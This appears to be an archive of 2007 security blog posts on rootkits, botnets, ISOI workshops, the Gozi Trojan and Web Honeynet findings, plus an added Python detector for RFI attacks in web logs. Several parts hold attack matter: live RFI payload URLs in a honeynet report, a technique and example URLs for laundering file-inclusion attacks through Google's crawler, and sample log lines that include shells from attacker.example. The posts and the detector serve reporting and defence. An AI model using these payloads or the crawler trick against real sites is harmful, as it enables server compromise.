Cisco: We know IOS rootkits can be made - harden your system

Cisco has released an updated version of its Cisco Security Response: Rootkits on Cisco IOS Devices document, following the EuSecWest presentation by Sebastian Muniz (Core Security).

It appears to cover hardening and best practices.

Thanks to Gadi E. for pointing this out on the mailing lists.


MBR rootkit - here are some references

Prevx Blog has a good writeup located at prevx.com/blog/75/Master-Boot-Record-Rootkit…

SANS Internet Storm Center has released an interesting timeline story - link here.

From the post, based on VeriSign iDefense data:

….

  • Oct. 30, 2007 - Original version of the MBR rootkit written and tested by the attackers
  • Dec. 12, 2007 - First known attacks installing MBR code; about 1,800 users infected in four days

McAfee detects the Trojan as StealthMBR (DAT 5204 or above) and Symantec as Trojan.Mebroot. Sophos, in turn, uses the name Troj/Mbroot-A. The names Trojan.Win32.Agent.dsj and TROJ_AGENT.APA have been assigned as well.

10th Jan: Trend Micro uses the name TROJ_SINOWAL.AD
12th Jan: Symantec sees the infected MBR as Boot.Mebroot. McAfee uses the name StealthMBR!rootkit too.


Sony about rootkits: Not many USM-F sticks were sold

New information is available on the rootkit issue in Sony MicroVault USB sticks with a built-in fingerprint reader.

One of the stories is this Computer Weekly article which states:

A Sony spokesperson said: “While relatively small numbers of these models were sold, we are taking the matter seriously and conducting an internal investigation. No customers have reported problems related to situation to date.”

And earlier, F-Secure’s Mikko Hyppönen reported that there are several reasons this issue is less serious than Sony BMG’s XCP case was.


Now fingerprint reader and rootkits - Sony did it again

This report by F-Secure’s Mika Ståhlberg states that the MicroVault USM-F fingerprint reader software shipped with that Sony USB stick installs a driver that hides a directory under C:\Windows.

And, reportedly, the F-Secure research laboratory also tested the latest software version available from Sony at www.sony.net/Products/Media/Microvault/ and this version contains the same hiding functionality as well. [added a hyperlink]

Hmmm - time to wear my white T-shirt with text familiar to many readers - “Most people don’t even know what a rootkit is, so why should they care about it?”


ISOI 3 is on, and Washington DC is hot

Following up on that strange title, ISOI 3 (Internet Security Operations and Intelligence), a workshop for do-ers who work on the security of the Internet and its users, is happening Monday and Tuesday in Washington, DC.

This time around we have even more government participation (we’re in DC, duh), but a bit less from academia (who can try and look at long term solutions), rather than just us security researchers, and operators (who respond, contain and mitigate incidents).

I am very pleased with our progress on encouraging global cooperation, and getting more industry information sharing going. I am also happy we are moving from “just” good-will based relationships to the physical world with our efforts, being able to take things to the next level with world-wide operational task forces and, indeed, effecting change.

If you are interested in this realm of Internet security operations, take a look at ISOI 3’s schedule, and perhaps submit something for the next workshop.

Some reporters are somewhat annoyed that entrance is barred to them, but I hope they’d understand that although we make things public whenever we can as full disclosure is a strong weapon in the fight against cyber crime, folks can not share as openly when they have to be on their toes all the time.

The third ISOI is here because after DHS ended up unable to host it, sponsors emerged who were happy to assist:

Afilias Ltd.: http://www.afilias.info/
ICANN: http://www.icann.org/
The Internet Society: http://www.isoc.org/
Shinkuro, Inc.: http://www.shinkuro.com/

It’s going to be an interesting next week here at the swamp. Attendees had better show up with their two forms of ID. :)

Gadi Evron,
ge@linuxbox.org.


CFP: ISOI III (a DA workshop)

CFP: ISOI III (a DA workshop)
=============================

Introduction
————

CFP information and current speakers below.

ISOI 3 (Internet Security Operations and Intelligence) will be held in
Washington DC this August the 27th, 28th.

This time around the folks at US-CERT (Department of Homeland Security -
DHS) are hosting. Sunbelt Software is running the after-party dinner.

We only have a partial agenda at this time (see below), but to remind you of what you will see, here are the previous ones:
http://isotf.org/isoi2.html
http://isotf.org/isoi.html

If you haven’t RSVP’d yet, please do so soon. Although we have 240 seats, we are running out of space.

A web page for ISOI 3 can be found at: http://isotf.org/isoi3.html

Details
——-
27th, 28th August, 2007
Washington DC -
AED conference center:
http://www.aedconferencecenter.org/main/html/main.html

Registration via contact@isotf.org is mandatory; there is no cost attached to attending. Check on our web page whether you qualify for a seat.

CFP

This is the official CFP for ISOI 3. Main subjects include: fastflux, fraud, DDoS, botnets. Other subjects relating to Internet security operations are also welcome.

As you can see below, our current speakers lecture on anything from Estonia’s “war” to current Web 2.0 threats in the wild.

Please email contact@isotf.org as soon as possible to submit a proposal. I will gather them and give them to our committee (Jeff Moss) for review.

Current speakers (before committee decision)
——————————————–

Roger Thompson (Exp Labs)
- Google AdWords... the dangers of dealing with the Russian mafia

Barry Raveendran Greene (Cisco)
- What you should be asking me as a routing vendor

John LaCour (Mark Monitor)
- Vulnerabilities used to hack sites for phishing
- Using XSS to track phishers

Dan Hubbard (Websense)
- Mpack and Honeyjax (Web 2.0 honeypots)

April Lorenzen
- Fastflux: Operational Update

William Salusky (AOL)
- The Spammer Evolves - Migration to WebMail

Hillar Aarelaid (Estonian CERT)
- Incident Response during the Recent Attack

Gadi Evron (Beyond Security)
- Strategic Lessons from the Estonian “First Internet War”

Jose Nazario (Arbor)
- Botnet statistics from the Estonian attack

Andrew Fried (Treasury Department)
- Phishing and the IRS - New Methods

Danny McPherson (Arbor)
- TBA


Malware went commercial

In a post in the Washington Post, Brian Krebs describes how malware authors have started spending cash on sponsored links for high-profile keywords that are regularly searched for by poorly patched users, so that they can infect them with malware.

One such high-profile keyword is the BBB, the Better Business Bureau, which, as you would guess, most average Joes will visit and search for while buying something, whereas buying the keyword “Slashdot” won’t get you far :) .

This is of course an interesting move, though not so unexpected. I can see a “legit company” coming soon: a malware distribution organization with an R&D department (create new malware and find new vulnerabilities), a Marketing department (buy high-profile keywords, or generally get people interested in your malware-infected web site) and a Sales department (sell botnets and infected/hacked computers for money).


Gozi Trojan analysis

SecureWorks has posted an analysis of another Trojan, this one used to steal SSL/TLS-encrypted data transferred from the victimized PC.

A single attack by a single variant compromised more than 5,200 hosts and 10,000 user accounts on hundreds of sites.

  • Steals SSL data using advanced Winsock2 functionality
  • State-of-the-art, modularized Trojan code
  • Spread through IE browser exploits
  • Undetected for weeks, months by many AV vendors
  • Customized server/database code to collect sensitive data
  • Customer interface for on-line purchases of stolen data
  • Accounts compromised by stealing data primarily from infected home PCs
  • Accounts at top financial, retail, health care, and government services affected
  • Data’s black market value at least $2 million

Full article is here.


MS OneCare last in anti-virus tests - what’s the future

The Austrian AV-Comparatives web site tested 17 AV products, including several free anti-virus programs.
Link to the test: www.av-comparatives.org/
(select ‘Comparatives’ and ‘On-demand comparative / February 2007′)

Microsoft’s Live OneCare was the only product rated below the ‘Standard’ level; it detected only 82.4 percent of the malware in the test set. Several well-known vendors scored 97.9 percent, and the winner scored 99.5 percent.
OneCare’s detection of polymorphic viruses was poor as well, says the report.

This is not the only detection test that has been published, and AV-Comparatives will release more tests of this kind later this year. We will see whether the result changes.


Web Honeynet Project: announcement, exploit URLs this Wednesday

Important note: the name of the Web Honeynet Project has been changed to the Web Honeynet Task Force to avoid confusion with the Honeynet Project.

[ Warning: this post includes links to live web server malware propagated this Wednesday via file inclusion exploits. These links are not safe! ]

Hello.

The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will in the next few months announce research on real-world web server attacks which infect web servers with tools, connect-back shells, bots, downloaders, malware, etc., all of which are cross-platform (for web servers) and currently exploited in the wild.

The Web Honeynet Project will, for now, not deal with the regular SQL injection and XSS attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

These attacks form botnets constructed from web servers (mainly IIS and Apache on Windows and Linux servers) and transform hosting farms/colos into attack platforms.

Most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) PHP web applications, as is well known and established.

PHP (or scripting) shells, etc. have been known for a while, as have file inclusion (or RFI) attacks; however, they were mostly treated as something secondary, and not much attention (if any, save for some blogs and a few mailing list posts a year ago) was given to the subject other than to the vulnerabilities themselves.

The bad guys currently exploit, build botnets and deface on a massive scale, forcing ISPs and colos to combat an impossible situation in which any (mainly PHP) application belonging to any user can be used to exploit entire server farms, and in which the web vulnerability serves either as a remote exploit to be followed by a local code execution one, or as a direct one.

What is new here is the scale, and the fact that we are now starting to engage the bad guys on this front (on which, so far, they have been unchallenged). Meaning that aside from research, the Web Honeynet Project will also release actionable data on offensive IP addresses, URLs and the tools themselves, to be made available to operational folks so that they can mitigate the threat.

It’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc., years ago. Several folks (and quite loudly, me) have been warning about this for a while; now it’s time to take action instead of talk. :)

Note: Below you can find sample statistics on some of the Web Honeynet Project information for this last Wednesday, on file inclusion attacks seeding malware.
You will likely notice most of these have been taken care of by now.

The first research on the subject (after looking into several hundred such tools) will be made public on the February edition of the Virus Bulletin magazine, from:
Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).

The SecuriTeam and ISOTF Web Honeynet Project is supported by Beyond Security ( http://www.beyondsecurity.com ).

Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the new members of the project.

For more information on the Web Honeynet Project feel free to contact me.

Also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

Sample report and statistics (for Wednesday the 10th of January, 2007):

IP | Hit Count | Malware (Count), … |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)


Drop zones and an intelligence war

In this post ( http://www.phenoelit.net/lablog/Irresponsible.sl ), FX describes a drop zone for a phishing/banking trojan horse, and how he got to it.

Go FX. I will refrain from commenting on the report he describes from secure science, which I guess is a comment on its own.

We had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public).

Once with a very large “security intelligence” company giving out drop zone data in a marketing attempt to get more bank clients (“hey buddy, why are 400 banks surfing to our drop zone?!?!”).

The second time with a guy at Defcon showing a live drop zone, and the data analysis for it, asking for it to be taken down (it wasn’t until a week later, during the same lecture at the first ISOI workshop hosted by Cisco). In this guy’s defense, though, he was sharing information. At a time when nearly no one was aware of drop zones, even though they had been happening for years, he openly shared data which was commercially valuable, and allowed others to clue up on the threats.

Did anyone ever consider that this is an intelligence source, and that a takedown is not exactly the smartest move?

It’s enough that the good guys all fight over the same information, and even the most experienced security professionals make mistakes that cost in millions of USD daily, but publishing drop zone IPs publicly? That can only result in a lost intelligence source and the next one being, say, not so available.

I believe in public information and the harm of over-secrecy, I am however a very strong believer that some things are secrets for a reason. What can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries.

At least we have responsible folks like FX around to take care of things when others screw up.

I got tired of being the bad guy calling “the king is naked”, at least in this case we can blame FX. :)

It’s an intelligence war people, and it is high time we got our act together.

I will raise this subject at the next ISOI workshop hosted by Microsoft
( http://isotf.org/isoi2.html ) and see what bright ideas we come up with.

Gadi Evron,
ge@linuxbox.org.


Botnets: a retrospective to 2006, and where we are headed in 2007

A few months back I released a post on where I think anti-botnets technology is heading. Now it’s time for what happened in 2006, and what we can expect from here on.

I am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. This is why I will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

What changed with botnets in 2006:

1. Botnets reached a level where it is unclear today what parts of the Internet are not compromised to some extent. Count by clean rather than infected.
2. Botnets have become the most significant platform from which virtually any type of online attack and crime are launched. Botnets equal an online infrastructure for abusive or criminal activity online.
3. In the past year, botnets have become mainstream. From a non-existent field, even in the professional realm, up to a few years ago (while attacks were happening constantly regardless), it has turned into the main buzzword and occupation of the security industry today, directly and indirectly.
4. Websites have returned to being one of the most significant vectors of infection for building botnets, which hadn’t been the case since the late 90s.
5. Botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. New technologies are finally being introduced, moving botnet controllers from using just (or mainly) IRC to more advanced C&C (command and control) channels such as P2P, or multi-layered ones such as DNS and IRC combined.
7. Botnets used to be a game of quantity. Today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

What’s going to happen with botnets in 2007:

Botnets won’t change. All will remain the same as it has been for years. Awareness, however, will increase, making the problem appear larger and larger, perhaps approaching its real scale. The bad guys will utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash, maximizing their revenue.

Further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering to shameless and open shows of strength against those who oppose them (think Blue Security), in the real world as well as the cyber one (which to the mob is one and the same; it’s the income that speaks).

Meaning, the existing botnet infrastructure will be utilized both in an open fashion, due to the fact that online miscreants (the real-world mob) face virtually no risk, as well as for quiet and secretive third-party intelligence operations.

Gadi Evron,
ge@linuxbox.org.


Internet Security Operations and Intelligence II

ISOI 2 is finalized. The schedule and agenda can be found here:
http://isotf.org/isoi2.html

I am going to do my best to release some of these presentations publicly after the event (if the authors agree), but it is not likely.

Some public feedback will be relayed from the workshop.

Gadi Evron,
ge@linuxbox.org.


Anonymizing RFI Attacks Through Google

Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of “Google hacking”, although that is how most of the sites vulnerable to RFI attacks are found).

By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.

PoC -
A malicious web page is constructed by an attacker, containing a URL built like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.

Example URL:
http://victim-site/RFI-exploit?http://URI-with-malicious-code.php

Google will harvest this URL, visit the site using its crawler and index it.
Meaning it accesses the target site with the URL it was provided, unwittingly exploiting it on behalf of whoever planted the link. It’s a feature, not a bug.

This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif

And note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
Which is no longer vulnerable. The %20 seems out of place, but this is how it is shown in the search.

Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?

Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why other attack types can’t be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.

Noam Rathaus.
(with thanks to Gadi Evron and Lev Toger)
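As an added example (not code from the original post, nor from the Web Honeynet Task Force), here is a small log-scanning script that ties the two RFI posts together: it flags remote-file-inclusion attempts in combined-format web server access logs, groups them per source IP in the same “IP | Hit Count | Malware (Count), …” layout as the honeynet sample report above, and marks hits whose user-agent is a search-engine crawler, which is the operational consequence of the Google trick: the IP in your log is the crawler’s, not the planter’s, so blocking it is the wrong response. It also normalizes the `http:/%20/` artifact seen in the search result above. All log lines, addresses (RFC 5737 documentation ranges) and the `attacker.example` hostname are constructed for the example, and the crawler user-agent list is an assumption to be adapted to whatever crawlers a site admits.

```python
"""Flag remote-file-inclusion (RFI) attempts in combined-format web server
access logs and summarise them per source IP.

Added example; not code from the original post or the Web Honeynet Task
Force. All log lines, IPs and hostnames below are constructed.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" format:
#   ip - - [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Crawlers that will fetch any URL planted on a page they index.
# Assumption: extend this to whatever crawlers your site admits.
CRAWLER_RE = re.compile(r"Googlebot|bingbot|Yahoo! Slurp|msnbot", re.I)

# A query value is an RFI attempt if, once decoded, it is an absolute URL.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.I)


def remote_includes(target):
    """Return the decoded remote URLs carried in a request target's query string.

    Handles both the ``?page=http://...`` and the bare ``?http://...`` forms,
    and strips whitespace that survives decoding (the ``http:/%20/`` artifact).
    """
    found = []
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        candidate = value if value else name     # bare "?http://..." has no "="
        cleaned = re.sub(r"\s+", "", unquote(candidate))
        if REMOTE_RE.match(cleaned):
            found.append(cleaned)
    return found


def detect_rfi(lines):
    """Yield one finding per log line that carries a remote include."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                             # not combined format; skip
        urls = remote_includes(m["target"])
        if urls:
            yield {"ip": m["ip"], "urls": urls,
                   "via_crawler": bool(CRAWLER_RE.search(m["agent"]))}


def summarise(findings):
    """Group findings as IP -> {hits, urls (url -> count), via_crawler}."""
    hits, urls, crawler = Counter(), defaultdict(Counter), defaultdict(bool)
    for f in findings:
        hits[f["ip"]] += 1
        urls[f["ip"]].update(f["urls"])
        crawler[f["ip"]] |= f["via_crawler"]
    return {ip: {"hits": hits[ip], "urls": dict(urls[ip]),
                 "via_crawler": crawler[ip]} for ip in hits}


def report(summary):
    """Render the summary in the 'IP | Hit Count | Malware (Count), ...' layout."""
    out = ["IP | Hit Count | Malware (Count), ... | Note"]
    for ip, s in sorted(summary.items(), key=lambda kv: -kv[1]["hits"]):
        mal = ", ".join(f"{u} ({n})" for u, n in sorted(s["urls"].items()))
        note = ("fetched by a search-engine crawler; the planter is elsewhere"
                if s["via_crawler"] else "direct")
        out.append(f"{ip} | {s['hits']} | {mal} | {note}")
    return "\n".join(out)


# Constructed sample log (RFC 5737 documentation addresses, .example hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2007:03:12:01 +0000] "GET /index.php?page=http://attacker.example/onuhack/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Jan/2007:03:12:04 +0000] "GET /index.php?page=http://attacker.example/onuhack/injek.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Jan/2007:03:12:09 +0000] "GET /admin/index.php?page=http://attacker.example/onuhack/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [10/Jan/2007:03:40:17 +0000] "GET /index.php?s=http:/%20/attacker.example/CMD.gif?cmd HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '192.0.2.9 - - [10/Jan/2007:03:55:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 3000 "-" "Mozilla/5.0 (X11; Linux)"',
    '192.0.2.44 - - [10/Jan/2007:04:01:33 +0000] "GET /cgi-bin/view.php?http://attacker.example/shell.php HTTP/1.0" 404 0 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    print(report(summarise(detect_rfi(SAMPLE_LOG))))
```

Run stand-alone it prints three rows: the direct attacker with three hits and two distinct payload URLs, the crawler-originated hit flagged as planted elsewhere, and the bare `?http://…` form. The benign `page=about` request does not appear. The crawler flag is the point: for those rows the remediation is to fix the include, not to blocklist the crawler’s address.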


Real life uses for vulnerabilities: [funsec] Haxdoor: UK Police Count 8,500 Victims in Data Theft (So Far)

As can be seen in the quoted message below –

So, here we go. Real-life uses for vulnerabilities.

Below is an example of just ONE “drop-zone” server in the United States, which has “600 financial companies and banks”.

Several gigs of data.

How do these things work?
(more…)
